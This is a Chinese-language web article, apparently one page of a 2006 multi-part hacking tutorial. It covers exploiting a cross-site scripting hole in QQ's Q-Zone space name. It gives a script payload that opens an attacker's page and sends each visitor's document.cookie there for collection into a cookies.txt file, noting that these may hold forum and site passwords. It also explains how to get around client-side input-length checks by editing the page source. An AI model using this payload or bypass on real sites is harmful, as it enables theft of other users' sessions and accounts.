开发学院网络安全黑客技术 Q-Zone跨站入侵漏洞的详细分析与利用 阅读

Q-Zone跨站入侵漏洞的详细分析与利用

 2006-11-07 20:08:59 来源:WEB开发网   
核心提示: 2、在Q-Zone中写入盗Cookie代码运行“Q-ZONE个人空间名称跨站漏洞利用工具”,将下面的代码提交插入到Q-Zone中:“<script>window.open('http://***/info.asp?msg='+

2、在Q-Zone中写入盗Cookie代码

运行“Q-ZONE个人空间名称跨站漏洞利用工具”,将下面的代码提交插入到Q-Zone中:
    “<script>window.open('http://***/info.asp?msg='+document.cookie)</script>”

当其他QQ用户浏览你的Q-Zone时,就会将在当前网页中新开一个窗口,连接到你指定的收集Cookie网页,并将自己的COOKIE内容发送到网站空间中的"cookies.txt"文件内,打开该文件后,就可以看到所有用户的COOKIE信息,而这些COOKIE信息中很可能就包括着用户的各个论坛和网站密码帐号哦!

小知识:CSS跨站漏洞

跨站漏洞又叫CSS漏洞,这里的CSS可不是网站设计中的CSS(分层样式表),而是指黑客入侵者通过某种方式,在远程的WEB页面的HTML代码中写入特殊的字符串。当其它上网者在浏览此页面时,嵌入页面中的这些字符就会被作为一段脚本代码而执行。

黑客向远程页面中写入代码的方法很多,比如最常见的是在论坛中发帖时,在帖子中加入可执行的代码;或者在网站的用户资料修改处,也可以通过更改签名、联系方式等,在用户信息页面中嵌入脚本代码。无论采用何种方式写入执行代码时,要求网页程序没有对用户输入的数据进行严格的过滤,有的网页程序限制了用户写入的字符类型,有危险的特殊代码就无法写入执行。利用跨站漏洞,入侵者可以进行非常多的攻击,比如盗取别的人COOKIES中的帐号和密码,或者伪造页面信息、进行拒绝服务等。可以说跨站漏洞是一个危害性非常大的漏洞。

用户输入过滤方式

网页程序对用户输入进行过滤的方式一般有两种:一种是在服务端进行过滤,也就是说当用户将数据提交到网页服务器后,在服务器端对用户的输入进行检测过滤是否符合要求;另外一种是在客户端进行过滤,也就是说当用户输入数据后,在将数据提交发送到远程的网站服务器上时,首先在客户端进行数据过滤检测,符合要求再发送。比如许多网页程序为了防止用户构造提交的数据进行SQL攻击,在远程服务器端进行了数据过滤;同时在许多网站上我们也可以看到一些用户注册之类的表单,限制了用户输入数据的长度,这些大部份是在客户端进行限制的。

修改IE提交数据

一般说来,对用户输入端进行的简单限制,可以通过直接修改网页源代码绕过。例如上面提到的对用户输入长度的限制,如果我们将源代码中的“maxlength="24"”改为“maxlength="1000"”,并将上面的检测用户输入内容的代码段删除掉后,保存成一个html文件后。再重新打开保存的HTML文件,就可以突破限制提交数据了。

上一页  1 2 3 4 

Tags:Zone 入侵 漏洞

编辑录入:爽爽 [复制链接] [打 印]
[]
  • 好
  • 好的评价 如果觉得好,就请您
      0%(0)
  • 差
  • 差的评价 如果觉得差,就请您
      0%(0)
赞助商链接